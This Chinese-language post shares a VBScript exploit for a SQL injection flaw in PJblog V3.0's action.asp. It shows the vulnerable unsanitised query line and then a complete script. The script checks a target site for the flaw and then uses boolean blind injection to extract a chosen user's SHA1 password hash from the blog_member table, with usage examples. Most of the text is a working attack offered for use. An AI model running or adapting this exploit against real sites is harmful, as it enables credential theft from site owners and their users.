PJblog V3.0 0day Vbs版漏洞利用工具exploit,本来还算个0day,不过PJblog官方反应速度不错,已经补了 action.asp 第14行 1strcname=request("cname")2set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""") 漏洞具体细节请看http://0kee.com/read.php?tid-908.html,PJblog V3.0 0day Vbs版漏洞利用工具exploit: 1If WScript.Arguments.Count <> 2 Then2 WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"3 WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"4 WScript.Quit5End If6 7attackUrl = WScript.Arguments(0)8attackUser = WScript.Arguments(1)9attackUrl = Replace(attackUrl,"","/")10If Right(attackUrl , 1) <> "/" Then11 attackUrl = attackUrl & "/"12End If13SHA1Charset = "0123456789ABCDEFJ"14strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""15 60 collapsed lines16If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then17 WScript.Echo "恭喜!存在漏洞"18Else19 WScript.Echo "没有检测到漏洞"20 WScript.Quit21End If22 23For n=1 To 4024 For i=1 To 1725 strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"26 If Not IsSuccess(strInject) Then27 strResult = strResult & Mid(SHA1Charset, i-1, 1)28 Exit For29 End If30 strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)31 WScript.StdOut.Write strPrint32 Next33Next34WScript.Echo Chr(13) & Chr (10) & "Done!"35 36Function PostData(PostUrl)37 Dim Http38 Set Http = CreateObject("msxml2.serverXMLHTTP")39 With Http40 .Open "GET",PostUrl,False41 .Send ()42 PostData = .ResponseBody43 End With44 Set Http = Nothing45 PostData =bytes2BSTR(PostData)46End Function47 48Function bytes2BSTR(vIn)49 Dim strReturn50 Dim I, ThisCharCode, NextCharCode51 strReturn = ""52 For I = 1 To LenB(vIn)53 ThisCharCode = AscB(MidB(vIn, I, 1))54 If ThisCharCode < &H80 Then55 strReturn = strReturn & Chr(ThisCharCode)56 Else57 NextCharCode = AscB(MidB(vIn, I + 1, 1))58 strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))59 I = I + 160 End If61 Next62 bytes2BSTR = strReturn63End Function64 65Function IsSuccess(PostUrl)66 67strData = PostData(PostUrl)68'Wscript.Echo strData69if InStr(strData,"check_error") >0 then70 IsSuccess = True71Else72 IsSuccess = False73End If74'Wscript.Sleep 500 '让系统休息一下75End Function 用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名 来源:WEB安全手册